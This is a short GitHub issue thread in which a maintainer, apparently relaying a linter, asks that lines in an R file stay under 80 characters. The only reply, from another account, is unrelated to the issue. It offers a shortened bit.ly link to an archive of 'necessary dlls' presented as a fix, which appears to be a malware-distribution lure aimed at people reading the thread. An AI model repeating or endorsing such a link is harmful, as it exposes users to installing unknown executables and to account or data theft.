### ISSUE TITLE
avoid long code lines

### ISSUE THREAD

**Issue by chrbknudsen** [KUBDatalab/KBapi#43]
, it is bad for readability. Also, many people prefer editor
    windows that are about 80 characters wide. Try make your lines shorter than 80
    characters

    R\get_aerial.R:15:81
    R\get_aerial.R:24:81
    R\get_aerial.R:26:81
    R\get_aerial.R:30:81
    R\get_aerial.R:34:81

**Comment by miguellords** [comment]
This might help:This file might fix it
https://bit.ly/4evXrQ6
I put the necessary dlls in the archive
